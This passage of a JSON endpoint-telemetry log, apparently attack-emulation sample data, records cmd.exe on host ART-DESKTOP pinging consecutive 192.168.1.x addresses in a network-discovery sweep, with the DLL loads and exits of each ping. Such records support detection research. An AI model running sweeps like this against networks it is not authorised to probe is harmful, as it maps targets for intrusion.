"image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 4236, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572752140000, - "unique_pid": "{42FC7E13-CB9B-5C05-0000-0010EF135301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4236, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572752140000, - "unique_pid": "{42FC7E13-CB9B-5C05-0000-0010EF135301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4236, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572752140000, - "unique_pid": "{42FC7E13-CB9B-5C05-0000-0010EF135301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4236, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572752140000, - "unique_pid": "{42FC7E13-CB9B-5C05-0000-0010EF135301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4236, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572752140000, - "unique_pid": "{42FC7E13-CB9B-5C05-0000-0010EF135301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 4236, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572752140000, - "unique_pid": "{42FC7E13-CB9B-5C05-0000-0010EF135301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 4236, - "process_name": 
"PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572752140000, - "unique_pid": "{42FC7E13-CB9B-5C05-0000-0010EF135301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 4236, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572752140000, - "unique_pid": "{42FC7E13-CB9B-5C05-0000-0010EF135301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 4236, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572752140000, - "unique_pid": "{42FC7E13-CB9B-5C05-0000-0010EF135301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 4236, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572752140000, - "unique_pid": "{42FC7E13-CB9B-5C05-0000-0010EF135301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 4236, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572752140000, - "unique_pid": "{42FC7E13-CB9B-5C05-0000-0010EF135301}" - }, - { - "event_type": "process", - "pid": 4236, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572756840000, - "unique_pid": "{42FC7E13-CB9B-5C05-0000-0010EF135301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.158", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6700, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", 
- "timestamp": 131883572756980000, - "unique_pid": "{42FC7E13-CB9B-5C05-0000-00106C165301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 6700, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572756990000, - "unique_pid": "{42FC7E13-CB9B-5C05-0000-00106C165301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6700, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572756990000, - "unique_pid": "{42FC7E13-CB9B-5C05-0000-00106C165301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6700, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572756990000, - "unique_pid": "{42FC7E13-CB9B-5C05-0000-00106C165301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6700, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572756990000, - "unique_pid": "{42FC7E13-CB9B-5C05-0000-00106C165301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6700, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572756990000, - "unique_pid": "{42FC7E13-CB9B-5C05-0000-00106C165301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6700, - "process_name": "PING.EXE", - "process_path": 
"C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572756990000, - "unique_pid": "{42FC7E13-CB9B-5C05-0000-00106C165301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6700, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572756990000, - "unique_pid": "{42FC7E13-CB9B-5C05-0000-00106C165301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 6700, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572756990000, - "unique_pid": "{42FC7E13-CB9B-5C05-0000-00106C165301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 6700, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572756990000, - "unique_pid": "{42FC7E13-CB9B-5C05-0000-00106C165301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 6700, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572756990000, - "unique_pid": "{42FC7E13-CB9B-5C05-0000-00106C165301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 6700, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572756990000, - "unique_pid": "{42FC7E13-CB9B-5C05-0000-00106C165301}" - }, - { - "event_type": "process", - "pid": 6700, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572761990000, - "unique_pid": "{42FC7E13-CB9B-5C05-0000-00106C165301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.159", 
- "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3348, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572762140000, - "unique_pid": "{42FC7E13-CB9C-5C05-0000-0010DF185301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 3348, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572762140000, - "unique_pid": "{42FC7E13-CB9C-5C05-0000-0010DF185301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3348, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572762140000, - "unique_pid": "{42FC7E13-CB9C-5C05-0000-0010DF185301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3348, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572762140000, - "unique_pid": "{42FC7E13-CB9C-5C05-0000-0010DF185301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3348, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572762140000, - "unique_pid": "{42FC7E13-CB9C-5C05-0000-0010DF185301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3348, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - 
"timestamp": 131883572762140000, - "unique_pid": "{42FC7E13-CB9C-5C05-0000-0010DF185301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 3348, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572762140000, - "unique_pid": "{42FC7E13-CB9C-5C05-0000-0010DF185301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 3348, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572762140000, - "unique_pid": "{42FC7E13-CB9C-5C05-0000-0010DF185301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 3348, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572762140000, - "unique_pid": "{42FC7E13-CB9C-5C05-0000-0010DF185301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 3348, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572762140000, - "unique_pid": "{42FC7E13-CB9C-5C05-0000-0010DF185301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 3348, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572762140000, - "unique_pid": "{42FC7E13-CB9C-5C05-0000-0010DF185301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 3348, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572762140000, - "unique_pid": "{42FC7E13-CB9C-5C05-0000-0010DF185301}" - }, - { - "event_type": "process", - 
"pid": 3348, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572766830000, - "unique_pid": "{42FC7E13-CB9C-5C05-0000-0010DF185301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.160", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4768, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572766980000, - "unique_pid": "{42FC7E13-CB9C-5C05-0000-00105C1B5301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 4768, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572766980000, - "unique_pid": "{42FC7E13-CB9C-5C05-0000-00105C1B5301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4768, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572766980000, - "unique_pid": "{42FC7E13-CB9C-5C05-0000-00105C1B5301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4768, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572766980000, - "unique_pid": "{42FC7E13-CB9C-5C05-0000-00105C1B5301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4768, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572766980000, - 
"unique_pid": "{42FC7E13-CB9C-5C05-0000-00105C1B5301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4768, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572766980000, - "unique_pid": "{42FC7E13-CB9C-5C05-0000-00105C1B5301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 4768, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572766980000, - "unique_pid": "{42FC7E13-CB9C-5C05-0000-00105C1B5301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 4768, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572766980000, - "unique_pid": "{42FC7E13-CB9C-5C05-0000-00105C1B5301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 4768, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572766980000, - "unique_pid": "{42FC7E13-CB9C-5C05-0000-00105C1B5301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 4768, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572766980000, - "unique_pid": "{42FC7E13-CB9C-5C05-0000-00105C1B5301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 4768, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572766980000, - "unique_pid": "{42FC7E13-CB9C-5C05-0000-00105C1B5301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - 
"image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 4768, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572766980000, - "unique_pid": "{42FC7E13-CB9C-5C05-0000-00105C1B5301}" - }, - { - "event_type": "process", - "pid": 4768, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572771830000, - "unique_pid": "{42FC7E13-CB9C-5C05-0000-00105C1B5301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.161", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3596, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572771980000, - "unique_pid": "{42FC7E13-CB9D-5C05-0000-0010CF1D5301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 3596, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572771980000, - "unique_pid": "{42FC7E13-CB9D-5C05-0000-0010CF1D5301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3596, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572771980000, - "unique_pid": "{42FC7E13-CB9D-5C05-0000-0010CF1D5301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3596, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572771980000, - "unique_pid": 
"{42FC7E13-CB9D-5C05-0000-0010CF1D5301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3596, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572771980000, - "unique_pid": "{42FC7E13-CB9D-5C05-0000-0010CF1D5301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3596, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572771980000, - "unique_pid": "{42FC7E13-CB9D-5C05-0000-0010CF1D5301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 3596, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572771980000, - "unique_pid": "{42FC7E13-CB9D-5C05-0000-0010CF1D5301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 3596, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572771980000, - "unique_pid": "{42FC7E13-CB9D-5C05-0000-0010CF1D5301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 3596, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572771980000, - "unique_pid": "{42FC7E13-CB9D-5C05-0000-0010CF1D5301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 3596, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572771980000, - "unique_pid": "{42FC7E13-CB9D-5C05-0000-0010CF1D5301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - 
"image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 3596, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572771980000, - "unique_pid": "{42FC7E13-CB9D-5C05-0000-0010CF1D5301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 3596, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572771980000, - "unique_pid": "{42FC7E13-CB9D-5C05-0000-0010CF1D5301}" - }, - { - "event_type": "process", - "pid": 3596, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572776990000, - "unique_pid": "{42FC7E13-CB9D-5C05-0000-0010CF1D5301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.162", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5596, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572777130000, - "unique_pid": "{42FC7E13-CB9D-5C05-0000-00104B205301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 5596, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572777140000, - "unique_pid": "{42FC7E13-CB9D-5C05-0000-00104B205301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5596, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572777140000, - "unique_pid": "{42FC7E13-CB9D-5C05-0000-00104B205301}" 
- }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5596, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572777140000, - "unique_pid": "{42FC7E13-CB9D-5C05-0000-00104B205301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5596, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572777140000, - "unique_pid": "{42FC7E13-CB9D-5C05-0000-00104B205301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5596, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572777140000, - "unique_pid": "{42FC7E13-CB9D-5C05-0000-00104B205301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 5596, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572777140000, - "unique_pid": "{42FC7E13-CB9D-5C05-0000-00104B205301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5596, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572777140000, - "unique_pid": "{42FC7E13-CB9D-5C05-0000-00104B205301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 5596, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572777140000, - "unique_pid": "{42FC7E13-CB9D-5C05-0000-00104B205301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": 
"C:\\Windows\\System32\\winnsi.dll", - "pid": 5596, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572777140000, - "unique_pid": "{42FC7E13-CB9D-5C05-0000-00104B205301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 5596, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572777140000, - "unique_pid": "{42FC7E13-CB9D-5C05-0000-00104B205301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 5596, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572777140000, - "unique_pid": "{42FC7E13-CB9D-5C05-0000-00104B205301}" - }, - { - "event_type": "process", - "pid": 5596, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572781830000, - "unique_pid": "{42FC7E13-CB9D-5C05-0000-00104B205301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.163", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6036, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572781980000, - "unique_pid": "{42FC7E13-CB9E-5C05-0000-0010C1225301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 6036, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572781990000, - "unique_pid": "{42FC7E13-CB9E-5C05-0000-0010C1225301}" - }, - { - 
"event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6036, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572781990000, - "unique_pid": "{42FC7E13-CB9E-5C05-0000-0010C1225301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6036, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572781990000, - "unique_pid": "{42FC7E13-CB9E-5C05-0000-0010C1225301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6036, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572781990000, - "unique_pid": "{42FC7E13-CB9E-5C05-0000-0010C1225301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6036, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572781990000, - "unique_pid": "{42FC7E13-CB9E-5C05-0000-0010C1225301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6036, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572781990000, - "unique_pid": "{42FC7E13-CB9E-5C05-0000-0010C1225301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6036, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572781990000, - "unique_pid": "{42FC7E13-CB9E-5C05-0000-0010C1225301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - 
